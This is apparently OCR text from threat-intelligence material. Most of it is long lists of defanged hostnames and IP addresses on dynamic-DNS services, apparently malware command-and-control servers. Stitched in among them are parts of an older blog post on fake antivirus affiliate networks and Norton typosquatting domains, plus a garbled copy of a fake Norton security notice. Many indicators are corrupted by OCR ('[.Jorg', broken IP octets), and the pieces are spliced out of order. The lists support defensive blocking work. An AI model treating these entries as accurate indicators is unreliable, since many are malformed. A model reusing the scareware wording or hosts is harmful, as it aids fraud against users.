hxxp://viewil[.]publicvm[.]com/ 
hxxp://vikvik[.]duckdns[.]org/ 
hxxp://warda73[.]no-ip[.]biz/ 
hxxp://wazy1010[.]ddns[.]net/ 
hxxp://webconn[.]ddns[.]net/ 
hxxp://wecollect[.]duckdns[.]org/ 
hxxp://wertyuio[.]ddns[.]net/ 
hxxp://westshark[.]ddns[. ]net/ 
hxxp://wiindows[.]myvnc[.]com/ 
hxxp://windown/7service[.]ddns[.]net/ 
hxxp://windowslogon[.]ddns[.]net/ 
hxxp://windowsuport[.]duckdns[.]org/ 
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hxxp://winkwink[.]duckdns[.]org/ 
hxxp://winserver[.]zapto[.]org/ 
hxxp://woocun|[.]blogsyte[.]com/ 
hxxp://wsoo[.]ddns[. ]net/ 
hxxp://wtfwindows[.]myftp[.]biz/ 
hxxp://wymeserver777[.]ddns[.]net/ 
hxxp://xaker555[.]no-ip[.Jorg/ 
hxxp://xfxf[.]ddns[.]net/ 
hxxp://xnxx44[.]ddns[.]net/ 
hxxp://xpznrt2[.]ddns[.]net/ 
hxxp://xsara12[.]dnng[.]net/ 
hxxp://xtrmmarzonuevo[.]duckdns[.]org/ 
hxxp://xtyoservices[.]ddns[.]net/ 
hxxp://y9[.]ddns[.]net/ 
hxxp://yasircf[.]hopto[.]org/ 
hxxp://yazhagal4246[.]ddns[.]net/ 
hxxp://yojen0120[.]myddns[.]me/ 
hxxp://youfuckednow[.]ddns[.]net/ 
hxxp://younessp[.]ddns[.]net/ 
hxxp://youssefelmi[.]ddns[.]net/ 
hxxp://youtubersxd[.]ddns[.]net/ 
hxxp://yurmaufat[.]ddns[. ]net/ 
hxxp://z8gamescf[.]ddns[.]net/ 
hxxp://zayd506[.]ddns[.]net/ 
hxxp://zebircp[.]duckdns[.]org/ 
hxxp://zef[. ]bounceme[.]net/ 
hxxp://zekorap623[.]ddns[.]net/ 
hxxp://zerokart[.]kro[.]kr/ 
hxxp://zikokoko[.]ddns[.]net/ 
hxxp://zkthabani[.]hopto[.]Jorg/ 
hxxp://zohirsenia[.]ddns[.]net/ 
hxxp://zueirasemlimites[.]duckdns[.]org/ 
hxxp://zzxxcc2018[.]hopto[.]org/ 
hxxp://103[.]21[.]117[.]143/ 
hxxp://103[.]38[.]252[.]63/ 
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hxxp://103[.]40[.]163[.155/ 
hxxp://103[.]44[.]145[.]245/ 
hxxp://104[.]238[.]176[.]9/ 
hxxp://105[.]101[.]151[.]77/ 
hxxp://105[.]108[.]35[.]56/ 
hxxp://105[.]199[.]18[.]240/ 
hxxp://106[.]51[.]163[.]232/ 
hxxp://108[.]61[.]211[.]219/ 
hxxp://109[.]225[.]178[.]41/ 
hxxp://109[.]236[.]94[.]121/ 
hxxp://109[.]73[.]68[.]114/ 
hxxp://111[.]72[.]167[.]127/ 
hxxp://115[.]159[.]125[.]47/ 
hxxp://115[.]28[.]173[.]37/ 
hxxp://117[.]32[.]216[.]117/ 
hxxp://120[.]25[.]150[.]91/ 
hxxp://121[.]147[.]18[.]158/ 
hxxp://123[.]207[.]232[.]79/ 
hxxp://123456789123456789[.]myftp[.]biz/ 
hxxp://13[.]65[.]194[.]5/ 
hxxp://1337ace[.]ddns[.]net/ 
hxxp://1349874791[.]gnway[.]cc/ 
hxxp://137[.JO[.]O[.]1/ 
hxxp://138[.]122[.]118[.]154/ 
hxxp://139[.]199[.]187[.]28/ 
hxxp://14[.J222[.]182[.]50/ 
hxxp://141[.]255[.]144[.]72/ 
hxxp://141[.]255[.]148[.]161/ 
hxxp://141[.]255[.]150[.]159/ 
hxxp://141[.]255[.]159[.]49/ 
hxxp://144[.]48[.]242[.]221/ 
hxxp://1488[.]sytes[.]net/ 
hxxp://151[.]246[.]230[.]21/ 
hxxp://151[.]247[.]143[.]125/ 
hxxp://151[.]248[.]126[.]183/ 
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hxxp://151[.]72[.]17[.]61/ 
hxxp://156[.]206[.]211[.]12/ 
hxxp://159asd[.]duckdns[.]org/ 
hxxp://176[.]42[.]111[.]248/ 
hxxp://177mu[.]cn/ 
hxxp://178[.]74[.]111[.]106/ 
hxxp://181[.]143[.]118[.]164/ 
hxxp://183[.]82[.]99[.]133/ 
hxxp://185[.]32[.]221[.]23/ 
hxxp://185[.]82[.J220[.]152/ 
hxxp://186[.]84[.]216[.]126/ 
hxxp://187[.]180[.]186[.]181/ 
hxxp://188[.]166[.]76[.]144/ 
hxxp://188[.]215[.]131[.]47/ 
hxxp://188[.]24[.]119[.]27/ 
hxxp://188[.]3[.]13[.]98/ 
hxxp://189[.]174[.]125[.]60/ 
hxxp://190[.]240[.]24[.]2/ 
hxxp://192[.]137[.]O[.]15/ 
hxxp://192[.]248[.]32[.]193/ 
hxxp://192[.]92[.]42[.]25/ 
hxxp://197[.]2[.181[.]35/ 
hxxp://197[.]35[.]134[.169/ 
hxxp://197[.]48[.]183[.]72/ 
hxxp://198[.]144[.]106[.]135/ 
hxxp://1987omid[.]ddns[.]net/ 
hxxp://1fon1[.]ddns[. ]net/ 
hxxp://1mM4962f897[. Jiok[.]la/ 
hxxp://2[.]191[.]186[.]145/ 
hxxp://2[.]236[.]40[.]82/ 
hxxp://2[.]25[.]171[.]244/ 
hxxp://201[.]156[.]140[.]218/ 
hxxp://201[.]157[.]144[.]53/ 
hxxp://203[.]189[.]232[.]237/ 
hxxp://211[.]162[.]52[.]205/ 
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infected hosts in order to monetize, so basically, you have an affiliates network whose actions 
are directly driving the growth into all these areas. Throwing money into the underground 
marketplace as a "financial injection", is proving itself as a growth factor, and incentive for 
innovation on behalf of all the participants. 


Here are some of the most recent fake security software domains, a "deja vu" moment 
with a known RBN domain from a "previous life" that is also parked at one of the servers, 
and evidence that typosquatting for fraudulent purposes is still pretty active with a dozen of 
Norton Antivirus related domains, some of which have already started issuing "fake security 
notices" by brandjacking the vendor for traffic acquisition purposes. 


Antivirus-Alert .com (203.117.111.47) where pepato .org a domain that was used in the 
[4]Wired.com and History.com IFRAME injections, which back in March was also hosted at 
Hostfresh (58.65.238.59). 


softload2008name .com (78.157.143.250) 
softload2008nm .com 

softload2008n .com 

softload2008jq .com 


microantivir-2009 .com (91.208.0.223) 
scanner.microantivir-2009 .com 
microantivir2009 .com 
microantivirus-2009 .com 
microantivirus2009 .com 


ms-scan .com (91.208.0.228) 
msscanner .com 
ms-scanner .com 


Personalantispy .com (93.190.139.197) 
freepcsecure .com 

quickinstallpack .com 
quickdownloadpro .com 
advancedcleaner .com 
performanceoptimizer .com 
internetanonymizer .com 


ieprogramming .com (92.62.101.83) 
uptodatepage .com 

fileliveupdate .com 

qwertypages .com 

sharedupdates .com 

ierenewals .com 
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hxxp://213[.]136[.]83[.]173/ 
hxxp://213[.]183[.]58[.]40/ 
hxxp://213[.]244[.]123[.]94/ 
hxxp://219[.]235[.]O[.]93/ 
hxxp://22134520[.]ddns[.]net/ 
hxxp://222[.]168[.]1[.]2/ 
hxxp://222[.]79[.J227[.]93/ 
hxxp://27[.]198[.]135[.]116/ 
hxxp://2715729[.]vicp[.]net/ 
hxxp://31[.]146[.]202[.]169/ 
hxxp://31[.]210[.]117[.]132/ 
hxxp://34[.]208[.J211[.]52/ 
hxxp://35[.]161[.]238[.]10/ 
hxxp://37[.]114[.J]212[.]119/ 
hxxp://37[.]115[.]170[.]240/ 
hxxp://37[.]152[.]166[.]4/ 
hxxp://37[.]16[.]139[.186/ 
hxxp://37[.]239[.]8[.]89/ 
hxxp://37[.]254[.]193[.]172/ 
hxxp://39[.]43[.]231[.]228/ 
hxxp://41[.]226[.]168[.163/ 
hxxp://41[.]38[.]56[.]81/ 
hxxp://45[.]126[.]124[.]155/ 
hxxp://46[.]150[.]252[.]235/ 
hxxp://46[.]166[.]134[.]149/ 
hxxp://46[.]4[.]255[.]98/ 
hxxp://5[.]135[.]127[.]183/ 
hxxp://5[.]189[.]137[.]186/ 
hxxp://5[.]222[.]66[.]57/ 
hxxp://5[.]222[.]70[.]95/ 
hxxp://5[.]234[.]240[.]27/ 
hxxp://5[.]237[.]98[.]77/ 
hxxp://5107b712[.]all123[.]net/ 
hxxp://52[.]193[.]97[.]24/ 
hxxp://5701c196[.]123nat[.]com/ 


18963 


hxxp://58[.]213[.]154[.]197/ 
hxxp://61[.]153[.]104[.]113/ 
hxxp://66[.]70[.]198[.]243/ 
hxxp://6gh[. ]noip[.]me/ 
hxxp://726627[.]duckdns[. ]Jorg/ 
hxxp://77[.]171[.]37[.]46/ 
hxxp://77[.]81[.]197[.]144/ 
hxxp://79[.]137[.]223[.]139/ 
hxxp://79[.]153[.]52[.]235/ 
hxxp://79649759[.]ddns[.]net/ 
hxxp://7daysky[.Jin[.]3322[.]org/ 
hxxp://80[.]136[.]103[.]51/ 
hxxp://80[.]59[.]208[.]237/ 
hxxp://80[.]82[.]65[.]85/ 
hxxp://84[.]241[.]6[.]106/ 
hxxp://85[.]107[.]115[.]16/ 
hxxp://88[.]150[.]149[.]91/ 
hxxp://88[.]228[.]83[.]160/ 
hxxp://90[.]16[.]206[.]207/ 
hxxp://91[.]109[.]22[.]5/ 
hxxp://93[.]104[.]213[.]217/ 
hxxp://93[.]169[.]247[.]218/ 
hxxp://94[.]212[.]118[.]115/ 
hxxp://95[.]173[.]240[.]117/ 
hxxp://96750513[.]ddns[.]net/ 
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We see that you are mot wring Norton Anti-Virus” or you do not have the Latest Norton 
Acni-Virws™ updates. 

We strongly suggest downloading the Norton Security™ and Spyware Doctor™ which is 
available FREE with Google Pack™. 
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© Free cetection updates and checkin’ scanning 

© CORRES ARE FORCE EYEE, OwEeH, CrOiaNE ane MeyloggNr® 
© inchedien Smert Uedioten and scheduling te pratect your PC 


Click on the link or button below to download 
Google Pack™ with Norton Security™ and Spyware Doctor™ FREE. 
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hxxp://kaskw[.]myftp[.]biz/ 
hxxp://kaskw[.]zapto[.]org/ 
hxxp://kasofe123123aal[.]no-ip[.]biz/ 
hxxp://kasper[.]ddns[. ]net/ 
hxxp://keskes02122002[.]ddns[.]net/ 
hxxp://kevte26[.]zapto[.]org/ 
hxxp://khaleelO[.]zapto[.]Jorg/ 
hxxp://khalid-2016[.]noip[.]me/ 
hxxp://khantac[.]ddns[. ]net/ 
hxxp://kheridla[.]hopto[.]org/ 
hxxp://kingdom[. ]no-ip[.]biz/ 
hxxp://kinggg[.]ddns[.]net/ 
hxxp://kjgjgkhffh[. ]Jsytes[.]net/ 
hxxp://kka163[.]ddns[.]net/ 
hxxp://kkarox90[.]no-ip[.]Jorg/ 
hxxp://kmessi[.]myddns[.]me/ 
hxxp://korelev[.]no-ip[.Jorg/ 
hxxp://krem111[.]ddns[.]net/ 
hxxp://krlol[.]Jddns[.]net/ 
hxxp://ksbozo[.]ddns[.]net/ 
hxxp://kskdt[.]ddns[.]net/ 
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hxxp://kuraist[.]zapto[.]org/ 
hxxp://kusleratnt[.]duckdns[.]lorg/ 
hxxp://lahyarhmo[. ]hopto[.]org/ 
hxxp://lamorash[.]ddns[.]net/ 
hxxp://laze22[.]hopto[.]org/ 
hxxp://learnxea[.]duckdns[.]Jorg/ 
hxxp://led5526[.]ddns[.]net/ 
hxxp://likerrdd[.]myftp[.]biz/ 
hxxp://linonymousami[.]no-ip[.]org/ 
hxxp://lizdlezozifpo[.]ddns[.]net/ 
hxxp://local1232[.]ddns[.]net/ 
hxxp://locolocoloco[.]ddns[. ]net/ 
hxxp://lolman[.]ddns[.]net/ 
hxxp://lordxxx[.]myq-see[.]com/ 
hxxp://love2014[.]ddns[.]net/ 
hxxp://loveubaby[. ]3utilities[.]com/ 
hxxp://lputyr[.]myq-see[.]com/ 
hxxp://luxuriaecu[.]ddns[.]net/ 
hxxp://madblackO[.]sytes[.]net/ 
hxxp://madov-matrix25[.]no-ip[.]org/ 


hxxp://magemankoktelam[.]ddns[.]net/ 


hxxp://mahdi1379[.]ddns[.]net/ 
hxxp://mahdi3141[.]ddns[.]net/ 
hxxp://mahdibaba123[.]ddns[.]net/ 


hxxp://majed111111[.]myq-see[.]com/ 


hxxp://majod98m[.]ddns[.]net/ 
hxxp://makarand[.]no-ip[.]org/ 
hxxp://malakatef09[.]ddns[.]net/ 
hxxp://mamal9921[.]ddns[.]net/ 
hxxp://mami5255[.]duckdns[. ]Jorg/ 
hxxp://mar020one[.]hopto[.]org/ 
hxxp://marcsil[.]ddns[.]net/ 
hxxp://marknetz[.]hopto[.]org/ 
hxxp://marocmaroc[.]hopto[.]org/ 
hxxp://martin123456[.]no-ip[.Jorg/ 
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hxxp://masafat[.]ddns[.]net/ 
hxxp://maskaralama[.]ddns[.]net/ 
hxxp://masterat[.]myftp[.]Jorg/ 
hxxp://matgio[.]duckdns[. ]org/ 
hxxp://matrix-teste[.]ddns[.]net/ 
hxxp://mayyahaf[. ]no-ip[.]info/ 
hxxp://mazenttr2[.]hopto[.]org/ 
hxxp://me512[.]zapto[.Jorg/ 
hxxp://medoahmed3[.]ddns[. ]net/ 
hxxp://medx321[.]ddns[.]net/ 
hxxp://mee2008[. ]zaptol[.]org/ 
hxxp://mehost[.]ddns[.]net/ 
hxxp://mehtab123[.]ddns[.]net/ 
hxxp://memeaimen10[.]hopto[.]org/ 
hxxp://memexmama[.]ddns[.]net/ 
hxxp://mhoammedtty[.]hopto[.]org/ 
hxxp://mht3[.]ddns[.]net/ 
hxxp://microsoft-office[.]ddns[.]net/ 
hxxp://mido28[.]hopto[.]org/ 
hxxp://migo2018[.]zapto[.]org/ 
hxxp://mikaniki[.]ddns[.]net/ 
hxxp://mikestar[.]no-ip[.]biz/ 
hxxp://miltin2[.]no-ip[.Jorg/ 
hxxp://minou555[.]hopto[.]Jorg/ 
hxxp://misterx94[.]ddns[.]net/ 
hxxp://misty255[.]no-ip[.Jorg/ 
hxxp://mixtape2016[.]ddns[.]net/ 
hxxp://mmdjj212[.]myftp[.]biz/ 
hxxp://mobdro[.]hopto[.]org/ 
hxxp://mobilesOft[.]no-ip[.Jorg/ 
hxxp://mogahed[.]ddns[. ]net/ 
hxxp://mohamed11[.]ddns[.]net/ 
hxxp://mohamed4dz[.]ddns[. ]net/ 
hxxp://mohamedamine[.]ddns[. ]net/ 
hxxp://mohamedhg[.]no-ip[.]org/ 
18978 


hxxp://mohamednjrat111[.]no-ip[.]biz/ 
hxxp://mohammad2002[.]no-ip[.]biz/ 
hxxp://mohammadhk[.]ddns[.]net/ 
hxxp://mohammed22468[.]no-ip[.]biz/ 
hxxp://nohammed93mahdil[.]ddns[.]net/ 
hxxp://mohfort[.]ddns[.]net/ 
hxxp://mohmad[.]myftp[. ]biz/ 
hxxp://mohmdnor[.]ddns[.]net/ 
hxxp://mohsanali79355[.]ddns[.]net/ 
hxxp://mohsenfaz[.]ddns[.]net/ 
hxxp://moji1936[.]ddns[.]net/ 
hxxp://mokhter222029[.]ddns[.]net/ 
hxxp://moktarpicaasrinabil[.]zapto[.]org/ 
hxxp://momen-swesi[.]no-ip[.]biz/ 
hxxp://momo2015[.]duckdns[.]org/ 
hxxp://monitoring007[.]zapto[.]org/ 
hxxp://moonmar10[.]no-ip[.]biz/ 
hxxp://moosio[.]no-ip[.]biz/ 
hxxp://moseybook[.]com/ 
hxxp://moslim[.]ddns[.]net/ 
hxxp://mostafaafrotoO[.]ddns[.]net/ 
hxxp://motoshil[.]zapto[.]org/ 
hxxp://mphp[.]hopto[.]Jorg/ 
hxxp://mrblacklife[.]ddns[.]net/ 
hxxp://mrclone97[.]ddns[.]net/ 
hxxp://mrgnet[.]ddns[.]net/ 
hxxp://mrkriper3331[.]zapto[.lorg/ 
hxxp://mrm2[.]ddns[.]net/ 
hxxp://mrreda98[.]ddns[.]net/ 
hxxp://msficecream[.]ddns[.]net/ 
hxxp://msn-web[.]ddnsking[.]com/ 
hxxp://msn79[.]ddns[.]net/ 
hxxp://mstar[.]ddns[.]net/ 
hxxp://mstfa10[.]ddns[.]net/ 


hxxp://murryapplicazione[.]no-ip[.]org/ 
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hxxp://muxamilu[.]hopto[.]org/ 
hxxp://mwanika[.]no-ip[.]biz/ 
hxxp://myaw[.]no-ip[.]biz/ 
hxxp://myfreerat[.]ddns[.]net/ 
hxxp://myfrenid2x[.]zapto[.]org/ 
hxxp://myhost123[.]myftp[.]biz/ 
hxxp://myillusionO2[.]hopto[.]Jorg/ 
hxxp://myonline[.]no-ip[.]biz/ 
hxxp://mypy23[.]ddns[.]net/ 
hxxp://nadineemmal[.]servegame[.]com/ 
hxxp://namandroidk63[.]zapto[.]org/ 
hxxp://napaixonado[.]ddns[.]net/ 
hxxp://nassahsliman[.]ddns[.]net/ 
hxxp://nemesis2017[.]zapto[.]org/ 
hxxp://netflix-ip[.]hopto[.]org/ 
hxxp://new777[.]ddns[.]net/ 
hxxp://newword[.]serveblog[.]net/ 
hxxp://newxor2[.]no-ip[.Jorg/ 
hxxp://ninjabird29[.]Jmyvnc[.]com/ 
hxxp://nirajpawar1997[.]ddns[.]net/ 
hxxp://njesra[.]ddns[.]net/ 
hxxp://nododg[.]ddns[.]net/ 
hxxp://nohacker[.]ddns[.]net/ 
hxxp://noiphackk[.]ddns[. ]net/ 
hxxp://noipjajaja[.]ddns[.]net/ 
hxxp://nowgirlas[.]ddns[.]net/ 
hxxp://noxrr[.]ddns[.]net/ 
hxxp://nulldoesnotexist[.]duckdns[.]org/ 
hxxp://oday1995[.]zapto[.Jorg/ 
hxxp://oko[.]gotdns[.]ch/ 
hxxp://omar[.]no-ip[.]biz/ 
hxxp://oneriakosa[.]ddns[.]net/ 
hxxp://opt91[.]ddns[.]net/ 
hxxp://orihacker[.]ddns[.]net/ 
hxxp://osamarizk[.]ddns[.]net/ 
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hxxp://osmsalem[.]ddns[.]net/ 
hxxp://ospr[.]publicvm[.]com/ 
hxxp://oussamal1997[.]ddns[.]net/ 
hxxp://oussamadj1997[.]ddns[. ]net/ 
hxxp://ovirus[.]ddns[.]net/ 
hxxp://owsen[.]ddns[.]net/ 
hxxp://paaradowx[.]hopto[.]lorg/ 
hxxp://parrotO1[.]hopto[.Jorg/ 
hxxp://pars[.]ddns[.]net/ 
hxxp://persir[.]no-ip[.]biz/ 
hxxp://phantom94[. ]ddns[.]net/ 
hxxp://photofix[.]hopto[.]Jorg/ 
hxxp://pianotiles2[.]ddns[.]net/ 
hxxp://pimpdaddy[.]myq-see[.]com/ 
hxxp://pippo86[.]no-ip[.]biz/ 
hxxp://portmeim[.]ddns[.]net/ 
hxxp://pplweb[.]pplmotorhomes[.]com/ 
hxxp://premium007[.]zapto[.]org/ 
hxxp://priyakumari[.]ddns[.]net/ 
hxxp://profmilf[.]zapto[.]org/ 
hxxp://prohacker[.]freedynamicdns[.]Jorg/ 
hxxp://projectp[.]ddns[.]net/ 
hxxp://pruebasernesto[.]ddns[.]net/ 
hxxp://qwerty1212[.]ddns[.]net/ 
hxxp://r0O0t[. ]myftp[. ]biz/ 
hxxp://r3cxw[.]ddns[.]net/ 
hxxp://r90[.]no-ip[.]biz/ 
hxxp://radouan123[.]hopto[.]Jorg/ 
hxxp://rahimtrx[.]hopto[.]org/ 
hxxp://raliphesus[.]ddns[.]net/ 
hxxp://rameezmaster[.]ddns[.]net/ 
hxxp://randsnaira[.]Jdnsdynamic[.]com/ 
hxxp://rarwindow[.]no-ip[.]biz/ 
hxxp://ratforandroid[.]ddns[.]net/ 
hxxp://rds11[.]ddns[.]net/ 
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hxxp://redcode[.]ddns[.]net/ 
hxxp://reddemon|[.]ddns[.]net/ 
hxxp://refsa[.]Jduckdns[.]org/ 
hxxp://reich666[.]ddns[.]net/ 
hxxp://reich777[.]ddns[.]net/ 
hxxp://remoteip999[.]ddns[.]net/ 
hxxp://rinalditeam[.]ddns[.]net/ 
hxxp://rmk133[.]hopto[.Jorg/ 
hxxp://rmx2121[.]ddns[.]net/ 
hxxp://rockrock[.]ddns[.]net/ 
hxxp://rok13198666[.]no-ip[.]biz/ 
hxxp://ron1372[.]ddns[.]net/ 
hxxp://royalhacker[.]zapto[.]Jorg/ 
hxxp://rposhowpick[.]ddns[.]net/ 
hxxp://rpswirkgkarp[.]p-e[.]kr/ 
hxxp://rzra51126[.]ddns[.]net/ 
hxxp://s[.]Jleas[.Jim/ 
hxxp://s3b4s[.]noip[.]me/ 
hxxp://sabbah[.]duckdns[.]org/ 
hxxp://sadaq[.]ddns[.]net/ 
hxxp://saiber-far68[. ]ddns[.]net/ 
hxxp://saighinissou[.]ddns[.]net/ 
hxxp://sajadianh[.]ddns[.]net/ 
hxxp://sajjadnassar3[.]no-ip[.]biz/ 
hxxp://salah067[. ]hopto[. ]Jorg/ 
hxxp://salarkalat[.]ddns[. ]net/ 
hxxp://salemaziz[.]hopto[.]lorg/ 
hxxp://samira[.]no-ip[.]biz/ 
hxxp://samoomalik[.]no-ip[.]biz/ 
hxxp://samuseucu[.]ddns[.]net/ 
hxxp://santamariagorettimestre[. Jit/ 
hxxp://saral19918[.]ddns[.]net/ 
hxxp://sarahwygan[. ]no-ip[. ]biz/ 
hxxp://saraia[.]ddns[.]net/ 
hxxp://sarasisi[.]no-ip[.]org/ 
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nortonanti-virus .com 
nortonantivirus.com 
nortonantiviruscom .com 
nortonantiviruscorporate .com 
nortonantiviruscorporateedition .com 
nortonantiviruscoupon .com 
nortonantivirusdefinition .com 
nortonantivirusdefinitions .com 
nortonantivirusdirect .com 


Fake Antivirus Inc. is not going away as long as the affiliate based model remains ac- 
tive. If the real vendors were greedy enough not to share the revenues with others, they 
would have been the one popping up on the radar, compared to the situation where it’s the 
affiliate network’s participations greed that’s increasing their visibility online. 


Related posts: 

[5]A Diverse Portfolio of Fake Security Software - Part Six 
[6]A Diverse Portfolio of Fake Security Software - Part Five 
[7]A Diverse Portfolio of Fake Security Software - Part Four 
[8]A Diverse Portfolio of Fake Security Software - Part Three 
[9]A Diverse Portfolio of Fake Security Software - Part Two 
[10]Diverse Portfolio of Fake Security Software 
[11]Cybersquatting Symantec’s Norton AntiVirus 
[12]Cybersquatting Security Vendors for Fraudulent Purposes 
[13]Fake Porn Sites Serving Malware - Part Three 

[14]Fake Porn Sites Serving Malware - Part Two 

[15]Fake Porn Sites Serving Malware 

[16]EstDomains and Intercage VS Cybercrime 

[17]Fake Security Software Domains Serving Exploits 
[18]Localized Fake Security Software 

[19]Got Your XPShield Up and Running? 

[20]Fake PestPatrol Security Software 

[21]RBN’s Fake Security Software 

[22]Lazy Summer Days at UkrTeleGroup Ltd 
[23]Geolocating Malicious ISPs 

[24]The Malicious ISPs You Rarely See in Any Report 


ttp://voices.washingtonpost.com/securityfix/2008/09/microsoft_washington_state_tar.htm 
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hxxp://sasi546454[.]hopto[.]lorg/ 
hxxp://sazan765[.]ddns[.]net/ 
hxxp://secureline2244[.]ddns[.]net/ 
hxxp://securepurpose[.]no-ip[.]Jinfo/ 
hxxp://securitytests[.]ddns[.]net/ 
hxxp://securitytestt[.]ddns[.]net/ 
hxxp://sedalbi[.]com/ 
hxxp://server4update[. ]serveftp[.]com/ 
hxxp://servidor23[.]ddns[.]net/ 
hxxp://servr[.]hopto[.]lorg/ 
hxxp://sesizkal32[.]no-ip[.]biz/ 
hxxp://seven1[.]ddns[.]net/ 
hxxp://seyf2017[.]linkpc[.]net/ 
hxxp://shahabhacker[. ]ddns[. ]net/ 
hxxp://shahidsajan[.]no-ip[.]biz/ 
hxxp://sharawy74[.]hopto[.Jorg/ 
hxxp://sharmayash[.]no-ip[.]biz/ 
hxxp://sherlockholmes[.]duckdns[.]Jorg/ 
hxxp://shgt[. ]tk/ 
hxxp://shoo2018[.]no-ip[.]org/ 
hxxp://shosh[.]ddns[. ]net/ 
hxxp://showj[.]f3322[.]net/ 
hxxp://skinchanger[.]hopto[.]org/ 
hxxp://skylex123[.]hopto[.]org/ 
hxxp://slavikkalinovskiy[.]ddns[.]net/ 
hxxp://slayslay[.]duckdns[.]Jorg/ 
hxxp://smiix2012[.]ddns[.]net/ 
hxxp://smk22[. ]jkt[.]net/ 
hxxp://snaider[.]hopto[.]Jorg/ 
hxxp://sniperviruse3[.]hopto[.]org/ 
hxxp://sniperyakub[.]ddns[.]net/ 
hxxp://socialplus[.]ddns[.]net/ 
hxxp://somenormalguy[.]duckdns[.]org/ 
hxxp://sondres1[.]ddns[.]net/ 
hxxp://sonkar412[.]duckdns[.]org/ 
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hxxp://sorry[.]duckdns[.]org/ 
hxxp://soso[.]noip[.]us/ 
hxxp://specre[.]com/ 
hxxp://spicymemes[.]duckdns[. ]org/ 
hxxp://spiel007[.]ddns[.]org/ 
hxxp://spofy[.]ddns[.]net/ 
hxxp://spynote-web[.]dynu[.]com/ 
hxxp://sramic[.]ddns[.]net/ 
hxxp://ssjf[.]Jmyftp[.]biz/ 
hxxp://standby1537[.]duckdns[.]org/ 
hxxp://storing[.]hopto[.]org/ 
hxxp://strateg[.]ddns[.]net/ 
hxxp://superlegitratvirus[.]ddns[.]net/ 
hxxp://svn-O1[.]ddns[.]net/ 
hxxp://sweetman2020[.]no-ip[.]biz/ 
hxxp://system32[.]com/ 
hxxp://tahal0Oigq[.]hopto[.]Jorg/ 
hxxp://taherhacker[.]hopto[.]org/ 
hxxp://tak[.]no-ip[.]info/ 
hxxp://takpar67[.]no-ip[.]biz/ 
hxxp://taras1928[.]ddns[.]net/ 
hxxp://targi01[.]hopto[.]org/ 
hxxp://tatacall[.]servebeer[.]com/ 
hxxp://tataline[.]hopto[.]lorg/ 
hxxp://tedy1993[.]ddns[.]net/ 
hxxp://test[.]pagez[.]kr/ 
hxxp://test145[.]ddns[.]net/ 
hxxp://test29[.]ddns[.]net/ 
hxxp://testan[.]ddns[.]net/ 
hxxp://testandro[.]ddns[.]net/ 
hxxp://testapkk[. ]hopto[.]org/ 
hxxp://testkps[.]ddns[.]net/ 
hxxp://testsr[.]ddns[.]net/ 
hxxp://testsss[.]ddns[.]net/ 
hxxp://testxy[.]ddns[.]net/ 
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hxxp://theblack16[.]ddns[.]net/ 
hxxp://thedroidjack[.]ddns[.]net/ 
hxxp://thegangsterrap[.]noip[.]me/ 
hxxp://thegod2[.]ddns[.]net/ 
hxxp://thekillers[.]ddns[.]net/ 
hxxp://themayhen23[.]no-ip[.]org/ 
hxxp://tnaxin[.]Jmsns[.]cn/ 
hxxp://tomyyk[.]ddns[.]net/ 
hxxp://tonyjony[.]ddns[.]net/ 
hxxp://topmax[.]myq-see[.]com/ 
hxxp://toyman6699[. ]no-ip[.]info/ 
hxxp://trythelast[.]no-ip[.]org/ 
hxxp://tunisvista[.]3utilities[.]com/ 
hxxp://udown[.]ddns[.]net/ 
hxxp://ufologlyly[.]ddns[. ]net/ 
hxxp://umar14344[.]ddns[.]net/ 
hxxp://unknownuser[.]no-ip[.]biz/ 
hxxp://updater[.]myftp[.]org/ 
hxxp://updatesystem|[.]dynu[.]com/ 
hxxp://updatexxx[.]hopto[.]org/ 
hxxp://usa[.]myftp[.]biz/ 
hxxp://usa2222[.]ddns[.]net/ 
hxxp://userframer[.]sytes[.]net/ 
hxxp://usernamegoprol1[.]ddns[.]net/ 
hxxp://usmh[.]myq-see[.]com/ 
hxxp://uzzal619[.]viewdns[.]net/ 
hxxp://vajausing[.]dynu[.]com/ 
hxxp://vego[.]ddns[.]net/ 
hxxp://vetalamator1[.]ddns[.]net/ 
hxxp://viagral[.]jumpingcrab[.]com/ 
hxxp://victim[.]no-ip[.]org/ 
hxxp://vigo[.]hopto[.]Jorg/ 
hxxp://vikas[.]no-ip[.]biz/ 
hxxp://villevalo[. ]chickenkiller[.]com/ 
hxxp://vipcoon[.]com/ 
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hxxp://vipmustafa[.]no-ip[.]info/ 
hxxp://vpnO[.]ddns[. ]net/ 
hxxp://vwelxv[.]ddns[. ]net/ 
hxxp://wOrm32[.]ddns[.]net/ 
hxxp://warl10ck[.]ddns[.]net/ 
hxxp://warrirrs[.]no-ip[.]org/ 
hxxp://wasawalid[.]hopto[.]org/ 
hxxp://wassam100[.]ddns[. ]net/ 
hxxp://wasxmrtdub[.]ddns[.]net/ 
hxxp://wcevwcvl[.]picp[.]net/ 
hxxp://webhack2017[.]ddns[.]net/ 
hxxp://webi7[.]ddns[. ]info/ 
hxxp://weedforlifehacker[.]ddns[.]net/ 
hxxp://welcomeheretomept[.]ddns[.]net/ 
hxxp://williettinger[.]cc/ 
hxxp://win32[.]ddns[.]net/ 
hxxp://windows12345[.]ddns[.]net/ 
hxxp://windows /trojan[.]ddns[.]net/ 
hxxp://winserver[.]dlinkddns[.]com/ 
hxxp://woaisue[.]3322[.]org/ 
hxxp://wogusnb[.]no-ip[.]info/ 
hxxp://wombocombo[.]mooo[.]com/ 
hxxp://wtfwtf[.]duckdns[. ]org/ 
hxxp://xalnewold[.]hopto[.]org/ 
hxxp://xilto[. ]duckdns[.]Jorg/ 
hxxp://xingyuekeji[.]f3322[.]net/ 
hxxp://xmppegyl.]com/ 
hxxp://xnxx123[.]publicvm[.]com/ 
hxxp://x0s1982[.]ddns[.]net/ 
hxxp://xtiger007[.]ddns[.]net/ 
hxxp://xzoro2016[.]no-ip[.]info/ 
hxxp://yangweb[. ]f3322[.]net/ 
hxxp://yassinescaleo[.]ddns[.]net/ 
hxxp://younix[.]ddns[.]net/ 
hxxp://yousefehab11[.]ddns[.]net/ 
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hxxp://youseffathii[.]ddns[.]net/ 
hxxp://youssef-1234[.]hopto[.]Jorg/ 
hxxp://yuosaf1993[.]ddns[.]net/ 
hxxp://yurimacedol[.]ddns[.]net/ 
hxxp://za3blawy[.]ddns[.]net/ 
hxxp://zaboza2020[.]ddns[.]net/ 
hxxp://zaheerkhan786[.]ddns[.]net/ 
hxxp://zakifr[.]no-ip[.]biz/ 
hxxp://zal75zk[.]ddns[.]net/ 
hxxp://zaliminxx[.]duckdns[.]Jorg/ 
hxxp://zaqatala[.]Jdynu[.]com/ 
hxxp://zennone[.]ddns[.]net/ 
